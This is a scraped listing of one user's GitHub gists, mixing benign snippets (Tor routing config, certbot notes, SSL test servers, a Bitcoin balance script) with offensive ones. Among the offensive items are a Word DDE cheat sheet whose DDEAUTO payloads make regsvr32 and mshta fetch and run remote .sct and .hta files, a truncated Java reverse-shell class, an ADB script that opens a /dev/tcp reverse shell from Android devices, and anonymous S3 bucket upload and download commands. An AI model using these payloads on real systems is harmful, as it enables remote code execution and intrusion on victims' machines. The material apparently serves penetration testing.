Add this to torrc ( located on /etc/tor/torrc):
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9051
CalfCrusher
/ route-all-traffic-through-tor.md
Created
October 25, 2022 18:30
— forked from numb95/route-all-traffic-through-tor.md
Route all internet traffic through Tor
CalfCrusher
/ readme.md
Created
October 22, 2022 00:33
— forked from sohlich/readme.md
Let's encrypt - generate SSL certificate manually via Cerbot DNS Challenge
Install Certbot
$ brew install certbot
CalfCrusher
/ readme.txt
Created
October 19, 2022 21:32
— forked from nathanqthai/readme.txt
simple tornado server with ssl
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| to generate example certs | |
| openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt | |
| run server: | |
| chmod +x server.py | |
| ./server.py | |
| test server: | |
| openssl s_client -connect localhost:8888 |
CalfCrusher
/ automatic-download.html
Last active
October 14, 2022 16:39
Automatic Download of a file using Javascript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type="text/javascript"> | |
| if (navigator.platform == 'Win32') { | |
| setTimeout(function () {window.location = 'https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe'; }, 2000) | |
| } | |
| </script> |
CalfCrusher
/ aws-s3-buckets-pentest.txt
Created
September 28, 2022 09:16
— forked from Anon-Exploiter/aws-s3-buckets-pentest.txt
Useful commands while testing s3 buckets!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aws s3 ls s3://s3buckethere --no-sign-request ## Lists the file in the s3 bucket | |
| aws s3 cp s3://bucketname/filethere.txt . --no-sign-request ## Downloads `filethere.txt` from the s3 bucket in the current directory | |
| aws s3 cp test.txt s3://bucketname --no-sign-request ## Uploads `test.txt` from current directory to the s3 bucket | |
| aws s3api get-bucket-acl --bucket bucketname --no-sign-request ## Shows ACL (Access Control List) of the given bucket | |
| aws s3api get-object-acl --bucket bucketname --key fileons3bucket.ext --no-sign-request ## Shows ACL (Access Control List) of given object in the bucket |
CalfCrusher
/ btcbal.py
Created
September 25, 2022 09:03
— forked from lukem512/btcbal.py
Retrieve Bitcoin address balance from Blockchain API
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| import getopt | |
| import urllib2 | |
| from optparse import OptionParser | |
| def main(): | |
| # variables | |
| btcaddr = "" |
CalfCrusher
/ Macro-Less-Cheatsheet.md
Created
August 8, 2022 18:30
— forked from mgeeky/Macro-Less-Cheatsheet.md
Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet
- Using
regsvr32*.sct files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
- Using
HTAfiles technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Not sure where I originally got this from. | |
| import java.io.IOException; | |
| import java.io.InputStream; | |
| import java.io.OutputStream; | |
| import java.net.Socket; | |
| public class C { | |
| public C() throws Exception { | |
| String host="10.0.0.90"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first. | |
| # By Random_Robbie | |
| adb connect $1:5555 | |
| adb shell sh -i >& /dev/tcp/$2/4444 0>&1 | |
| echo "[*] Should have a shell now ..... Be nice :) [*]" |
CalfCrusher
/ SimpleSecureHTTPServer.py
Created
April 20, 2022 16:02
— forked from sakti/SimpleSecureHTTPServer.py
simple secure http server using python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| SimpleSecureHTTPServer.py - simple HTTP server supporting SSL. | |
| - replace fpem with the location of your .pem server file. | |
| - the default port is 443. | |
| usage: python SimpleSecureHTTPServer.py | |
| Credit: https://code.activestate.com/recipes/442473-simple-http-server-supporting-ssl-secure-communica/ | |
| License: PSF License |